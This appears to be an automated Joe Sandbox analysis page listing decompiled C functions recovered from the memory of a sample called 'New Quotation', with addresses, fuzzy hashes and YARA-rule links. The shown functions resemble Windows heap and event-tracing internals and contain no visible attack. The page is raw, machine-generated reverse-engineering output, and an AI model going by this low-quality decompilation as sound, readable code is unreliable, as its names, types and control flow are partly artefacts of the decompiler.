                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7C7917(intOrPtr* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _t12;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr _t23;
				signed int _t25;

				_t16 = __ecx;
				_v8 = __ecx;
				_t23 = __edx;
				_t5 = _t16 + 0xe; // 0xe
				_t12 = E1D80035F(__edx, _t5, __ecx,  &_v12, 0,  &_v16,  &_v8);
				if(_t12 >= 0) {
					_t25 = _v8;
					if(_t25 != 0) {
						_t18 = _v12;
						if(_t18 != 0) {
							 *_t18 =  *_t25;
						}
						E1D7C7973(_t23, _t25);
						_t12 = E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t25);
					}
					return _t12;
				}
				return _t12;
			}











                                                                                                                                                                                          0x1d7c7917
                                                                                                                                                                                          0x1d7c7923
                                                                                                                                                                                          0x1d7c792a
                                                                                                                                                                                          0x1d7c7934
                                                                                                                                                                                          0x1d7c7939
                                                                                                                                                                                          0x1d7c7940
                                                                                                                                                                                          0x1d7c7943
                                                                                                                                                                                          0x1d7c7948
                                                                                                                                                                                          0x1d7c794a
                                                                                                                                                                                          0x1d7c794f
                                                                                                                                                                                          0x1d7c7953
                                                                                                                                                                                          0x1d7c7953
                                                                                                                                                                                          0x1d7c7959
                                                                                                                                                                                          0x1d7c796a
                                                                                                                                                                                          0x1d7c796a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c796f
                                                                                                                                                                                          0x1d7c7972

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 70fe1b5d095862a1dd704d59b03dd3e2a0a5c0279d36d032b1437476f14dda03
                                                                                                                                                                                          • Instruction ID: ceabdaeb6d3b317a1d0bf6aa9e5620e7402695dcc3224becd5aa019cdd575cc3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 70fe1b5d095862a1dd704d59b03dd3e2a0a5c0279d36d032b1437476f14dda03
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF04F76B01114AFDB15DB58C840FFEB7BEDF84B10F15016AA945EB250DA70EE01D791
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A4F7C Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 52%
                                                                                                                                                                                          			E1D8A4F7C(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				signed char* _t24;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t38;

				_t35 = __edx;
				_v8 =  *0x1d8cb370 ^ _t38;
				_v24 = __ecx;
				_v58 = 0x1c30;
				_v32 =  *((intOrPtr*)(__edx + 0xc8));
				_v28 =  *((intOrPtr*)(__edx + 0xcc));
				_v16 =  *((intOrPtr*)(__edx + 0xd8));
				_v20 = __edx;
				_v12 =  *((intOrPtr*)(__edx + 0xd4));
				if(E1D7E3C40() == 0) {
					_t24 = 0x7ffe0386;
				} else {
					_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v64);
				_push(0x18);
				_push(0x402);
				_push( *_t24 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t30, _v8 ^ _t38, _t35, _t36, _t37);
			}

















                                                                                                                                                                                          0x1d8a4f7c
                                                                                                                                                                                          0x1d8a4f8b
                                                                                                                                                                                          0x1d8a4f93
                                                                                                                                                                                          0x1d8a4f96
                                                                                                                                                                                          0x1d8a4fa0
                                                                                                                                                                                          0x1d8a4fa9
                                                                                                                                                                                          0x1d8a4fb2
                                                                                                                                                                                          0x1d8a4fbb
                                                                                                                                                                                          0x1d8a4fbe
                                                                                                                                                                                          0x1d8a4fc8
                                                                                                                                                                                          0x1d8a4fda
                                                                                                                                                                                          0x1d8a4fca
                                                                                                                                                                                          0x1d8a4fd3
                                                                                                                                                                                          0x1d8a4fd3
                                                                                                                                                                                          0x1d8a4fe5
                                                                                                                                                                                          0x1d8a4fe6
                                                                                                                                                                                          0x1d8a4fe8
                                                                                                                                                                                          0x1d8a4fed
                                                                                                                                                                                          0x1d8a4ffe

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: af8b24023ee386097b058cfc7fb830f293fd2f39337d1893d8a48d6f36131212
                                                                                                                                                                                          • Instruction ID: 335e49f23cfb18795dbf5c76437578b9ab145b42718127c6996945af62b6049f
                                                                                                                                                                                          • Opcode Fuzzy Hash: af8b24023ee386097b058cfc7fb830f293fd2f39337d1893d8a48d6f36131212
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E0108B4A00209DFDB04DFACD545B9EB7F4FF08704F1181AAB519EB391EA34AA448B91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FFDE0 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7FFDE0() {
				void* __ecx;
				void* _t15;
				intOrPtr* _t17;

				L1D7E2330(0xd, 0x93bd7660);
				_t17 =  *0x1d8c49c0; // 0x0
				if(_t17 != 0) {
					 *0x1d8c49c0 =  *_t17;
					 *0x1d8c49c4 =  *0x1d8c49c4 + 0xffff;
				}
				E1D7E24D0(0x93bd7660);
				if(_t17 == 0) {
					_t10 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L3;
					} else {
						return E1D7E5D90(_t15, _t10, 0, 0x20);
					}
				} else {
					L3:
					return _t17;
				}
			}






                                                                                                                                                                                          0x1d7ffdf8
                                                                                                                                                                                          0x1d7ffdfd
                                                                                                                                                                                          0x1d7ffe05
                                                                                                                                                                                          0x1d7ffe09
                                                                                                                                                                                          0x1d7ffe13
                                                                                                                                                                                          0x1d7ffe13
                                                                                                                                                                                          0x1d7ffe1b
                                                                                                                                                                                          0x1d7ffe22
                                                                                                                                                                                          0x1d7ffe30
                                                                                                                                                                                          0x1d7ffe35
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ffe37
                                                                                                                                                                                          0x1d7ffe44
                                                                                                                                                                                          0x1d7ffe44
                                                                                                                                                                                          0x1d7ffe24
                                                                                                                                                                                          0x1d7ffe24
                                                                                                                                                                                          0x1d7ffe29
                                                                                                                                                                                          0x1d7ffe29

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8163a556e5af37b53d537027bca29319ee4ceec0c6a8c376e9faacfb86f0b05c
                                                                                                                                                                                          • Instruction ID: a8eee8efa6697f66ad74927527b1ab660fbafea549f78a12290d897d0094806b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8163a556e5af37b53d537027bca29319ee4ceec0c6a8c376e9faacfb86f0b05c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0B477B1223097C2208A5CB884BBA7374EB89FB0F12026AFA00DB351DA14F84996D1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D88D9C6 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                          			E1D88D9C6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				void* __edi;
				signed char* _t15;
				intOrPtr _t21;
				signed int _t23;
				intOrPtr _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_v8 =  *0x1d8cb370 ^ _t32;
				_t28 = __ecx;
				_t29 =  &_v52;
				_t23 = 0xa;
				memset(_t29, 0, _t23 << 2);
				_t30 = _t29 + _t23;
				_v20 = _t28;
				_v46 = 0x268;
				if(E1D7E3C40() == 0) {
					_t15 = 0x7ffe0388;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v52);
				_push(8);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t21, _v8 ^ _t32, _t28, _t30, _t31);
			}
















                                                                                                                                                                                          0x1d88d9d5
                                                                                                                                                                                          0x1d88d9d9
                                                                                                                                                                                          0x1d88d9db
                                                                                                                                                                                          0x1d88d9e2
                                                                                                                                                                                          0x1d88d9e3
                                                                                                                                                                                          0x1d88d9e3
                                                                                                                                                                                          0x1d88d9ea
                                                                                                                                                                                          0x1d88d9ed
                                                                                                                                                                                          0x1d88d9f8
                                                                                                                                                                                          0x1d88da0a
                                                                                                                                                                                          0x1d88d9fa
                                                                                                                                                                                          0x1d88da03
                                                                                                                                                                                          0x1d88da03
                                                                                                                                                                                          0x1d88da15
                                                                                                                                                                                          0x1d88da16
                                                                                                                                                                                          0x1d88da18
                                                                                                                                                                                          0x1d88da1d
                                                                                                                                                                                          0x1d88da2f

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 03a35ccc6289ddad896ed7459df4f6d48fd6ac3d640f7c911630958a305a7d32
                                                                                                                                                                                          • Instruction ID: 3f467c18808f46a11900bd47309355edf8232b6d9338599c71a8d3761d81837e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 03a35ccc6289ddad896ed7459df4f6d48fd6ac3d640f7c911630958a305a7d32
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9F0CD71B04248EFDB04DBADD905A6EB3F8EF44A00F0140A9F601EB2E0EA70ED058712
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CFD20 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7CFD20() {
				intOrPtr _t8;
				intOrPtr* _t12;
				intOrPtr* _t14;

				_t14 = _t12;
				if( *0x1d8c49c4 >= 0xa) {
					if(_t14 >= 0x1d8c49e0) {
						if(_t14 < 0x1d8c4ae0) {
							goto L1;
						} else {
							goto L3;
						}
					} else {
						L3:
						return E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
					}
				} else {
					L1:
					L1D7E2330(0xd, 0x93bd7660);
					_t8 =  *0x1d8c49c0; // 0x0
					 *_t14 = _t8;
					 *0x1d8c49c4 =  *0x1d8c49c4 + 1;
					 *0x1d8c49c0 = _t14;
					return E1D7E24D0(0x93bd7660);
				}
			}






                                                                                                                                                                                          0x1d7cfd2d
                                                                                                                                                                                          0x1d7cfd2f
                                                                                                                                                                                          0x1d7cfd6d
                                                                                                                                                                                          0x1d7cfd8a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cfd8c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cfd8c
                                                                                                                                                                                          0x1d7cfd6f
                                                                                                                                                                                          0x1d7cfd6f
                                                                                                                                                                                          0x1d7cfd83
                                                                                                                                                                                          0x1d7cfd83
                                                                                                                                                                                          0x1d7cfd31
                                                                                                                                                                                          0x1d7cfd31
                                                                                                                                                                                          0x1d7cfd44
                                                                                                                                                                                          0x1d7cfd49
                                                                                                                                                                                          0x1d7cfd4e
                                                                                                                                                                                          0x1d7cfd50
                                                                                                                                                                                          0x1d7cfd58
                                                                                                                                                                                          0x1d7cfd66
                                                                                                                                                                                          0x1d7cfd66

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 011f240e296ba1d785363c185ab5d9b0f6bbabaeafbe7615bb050c942f6d72d6
                                                                                                                                                                                          • Instruction ID: 1dc6df7b29214cfd2215739238ac7b45aa59478e672e53e989c3796626fec028
                                                                                                                                                                                          • Opcode Fuzzy Hash: 011f240e296ba1d785363c185ab5d9b0f6bbabaeafbe7615bb050c942f6d72d6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EF02B37912170DEC2105B4CA484BE9B334F7957F2F010666E10287160E760A4C9C383
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D873EFC Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D873EFC(intOrPtr* __ecx) {
				intOrPtr _t8;
				void* _t14;
				intOrPtr* _t15;
				intOrPtr* _t16;

				_t15 = __ecx;
				if(__ecx == 0) {
					L8:
					return 0;
				}
				_t16 = E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t16 == 0) {
					goto L8;
				}
				_t11 =  *_t15;
				if( *_t15 == 0) {
					L4:
					_t12 =  *((intOrPtr*)(_t15 + 4));
					if( *((intOrPtr*)(_t15 + 4)) == 0) {
						L7:
						return _t16;
					}
					_t8 = E1D88B33D(_t12);
					 *((intOrPtr*)(_t16 + 4)) = _t8;
					if(_t8 != 0) {
						goto L7;
					}
					L6:
					E1D80BD71(_t8, _t16, _t14);
					_t16 = 0;
					goto L7;
				}
				_t8 = E1D7F5E34(_t11);
				 *_t16 = _t8;
				if(_t8 == 0) {
					goto L6;
				}
				goto L4;
			}







                                                                                                                                                                                          0x1d873f00
                                                                                                                                                                                          0x1d873f04
                                                                                                                                                                                          0x1d873f4f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d873f4f
                                                                                                                                                                                          0x1d873f18
                                                                                                                                                                                          0x1d873f1c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d873f1e
                                                                                                                                                                                          0x1d873f22
                                                                                                                                                                                          0x1d873f2f
                                                                                                                                                                                          0x1d873f2f
                                                                                                                                                                                          0x1d873f34
                                                                                                                                                                                          0x1d873f4b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d873f4b
                                                                                                                                                                                          0x1d873f36
                                                                                                                                                                                          0x1d873f3b
                                                                                                                                                                                          0x1d873f40
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d873f42
                                                                                                                                                                                          0x1d873f44
                                                                                                                                                                                          0x1d873f49
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d873f49
                                                                                                                                                                                          0x1d873f24
                                                                                                                                                                                          0x1d873f29
                                                                                                                                                                                          0x1d873f2d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 197a8c067fa2224d7c4f2d323e01aff28fba10e97c9d540b61f1ec7de288950a
                                                                                                                                                                                          • Instruction ID: 584f6d9f76e8dfef4390807b46acb8b727ad433bf1c785402b0e8b4460a05372
                                                                                                                                                                                          • Opcode Fuzzy Hash: 197a8c067fa2224d7c4f2d323e01aff28fba10e97c9d540b61f1ec7de288950a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF0E935342E1357D7259A299811B3A62B5EF80F90B03006CB5B5EB250DF20FC018383
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CBF70 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E1D7CBF70(void* __ecx, intOrPtr _a4) {
				char _v8;
				char _v12;
				intOrPtr _t10;
				signed int _t20;
				signed int _t22;

				_t10 = _a4;
				_t22 = 0;
				_t20 =  *((intOrPtr*)(_t10 + 0x14));
				_v12 = _t20;
				if(_t20 != 0) {
					if( *((intOrPtr*)(_t10 + 8)) == 0) {
						_v8 =  *((intOrPtr*)(_t10 + 0x1c)) - _t20;
						_push(0x8000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t22 = E1D812B90();
					} else {
						E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t20);
					}
				}
				return _t22;
			}








                                                                                                                                                                                          0x1d7cbf77
                                                                                                                                                                                          0x1d7cbf7b
                                                                                                                                                                                          0x1d7cbf7d
                                                                                                                                                                                          0x1d7cbf80
                                                                                                                                                                                          0x1d7cbf85
                                                                                                                                                                                          0x1d82d31c
                                                                                                                                                                                          0x1d82d338
                                                                                                                                                                                          0x1d82d33e
                                                                                                                                                                                          0x1d82d343
                                                                                                                                                                                          0x1d82d347
                                                                                                                                                                                          0x1d82d348
                                                                                                                                                                                          0x1d82d34f
                                                                                                                                                                                          0x1d82d31e
                                                                                                                                                                                          0x1d82d329
                                                                                                                                                                                          0x1d82d329
                                                                                                                                                                                          0x1d82d31c
                                                                                                                                                                                          0x1d7cbf8f

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d6a04297581aac59768f63668ebe9c51df94fd1ef3ae79eef58bf8edee963ecc
                                                                                                                                                                                          • Instruction ID: 4b99a7cc670c330fdd00a82bf3d1a98dc6c7649653ed75276267d2e23f28adea
                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a04297581aac59768f63668ebe9c51df94fd1ef3ae79eef58bf8edee963ecc
                                                                                                                                                                                          • Instruction Fuzzy Hash: CBF090B2504015FFCB15CF88C844EAA7BA8EB05B60B11426AB505D7250D530EE40CBE1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D88EF66 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                          			E1D88EF66(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1d8cb370 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E1D7E3C40() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                                                                                          0x1d88ef66
                                                                                                                                                                                          0x1d88ef75
                                                                                                                                                                                          0x1d88ef7b
                                                                                                                                                                                          0x1d88ef81
                                                                                                                                                                                          0x1d88ef89
                                                                                                                                                                                          0x1d88ef8c
                                                                                                                                                                                          0x1d88ef8f
                                                                                                                                                                                          0x1d88ef9a
                                                                                                                                                                                          0x1d88efac
                                                                                                                                                                                          0x1d88ef9c
                                                                                                                                                                                          0x1d88efa5
                                                                                                                                                                                          0x1d88efa5
                                                                                                                                                                                          0x1d88efb7
                                                                                                                                                                                          0x1d88efb8
                                                                                                                                                                                          0x1d88efba
                                                                                                                                                                                          0x1d88efbf
                                                                                                                                                                                          0x1d88efd0

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f1756d420a6bb9262f8d38b74de6833da97991557a42f4555e8337a5043e794c
                                                                                                                                                                                          • Instruction ID: 1761eb4b3e8150f9ec558fc14eea7676fe6b9b515522fa7ac70569aeecf8386e
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1756d420a6bb9262f8d38b74de6833da97991557a42f4555e8337a5043e794c
                                                                                                                                                                                          • Instruction Fuzzy Hash: B6F037B4A00208EFCB04DFA8D545A9EB7F8EF48704F0180AAB905EB391E674EA00CB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D88FC95 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E1D88FC95(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E1D88D919(__ecx);
				_t19 =  *0x1d8c6628 - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1d8c6960; // 0x0
					if(__eflags <= 0) {
						E1D88F82B();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1d8c6938 & 0x00000004;
							if(( *0x1d8c6938 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1d8c6938; // 0x0
					return E1D886B77(__ebx, 0xc0000374, 0x1d8c3960, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                                                                                                                          0x1d88fc98
                                                                                                                                                                                          0x1d88fc9a
                                                                                                                                                                                          0x1d88fc9f
                                                                                                                                                                                          0x1d88fca5
                                                                                                                                                                                          0x1d88fcc6
                                                                                                                                                                                          0x1d88fccc
                                                                                                                                                                                          0x1d88fcce
                                                                                                                                                                                          0x1d88fcd9
                                                                                                                                                                                          0x1d88fcdc
                                                                                                                                                                                          0x1d88fcde
                                                                                                                                                                                          0x1d88fceb
                                                                                                                                                                                          0x1d88fceb
                                                                                                                                                                                          0x1d88fcf2
                                                                                                                                                                                          0x1d88fcf4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88fcf4
                                                                                                                                                                                          0x1d88fce0
                                                                                                                                                                                          0x1d88fce5
                                                                                                                                                                                          0x1d88fce7
                                                                                                                                                                                          0x1d88fce9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88fce9
                                                                                                                                                                                          0x1d88fcde
                                                                                                                                                                                          0x1d88fcf6
                                                                                                                                                                                          0x1d88fca7
                                                                                                                                                                                          0x1d88fca7
                                                                                                                                                                                          0x1d88fcc5
                                                                                                                                                                                          0x1d88fcc5

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: af4154a565936782eefcb98b3c27e1b9ac7e53ab11ec3cb187adc975d7a0ac4e
                                                                                                                                                                                          • Instruction ID: 2f051f446efe5036c61a8a55ac467a4f50722c9a2a4399e1807299a92ff80261
                                                                                                                                                                                          • Opcode Fuzzy Hash: af4154a565936782eefcb98b3c27e1b9ac7e53ab11ec3cb187adc975d7a0ac4e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23F0277B40A2E29ACB115B3855923F07B62AB49128F161865DFA257222C574E687C212
                                                                                                                                                                                          Uniqueness

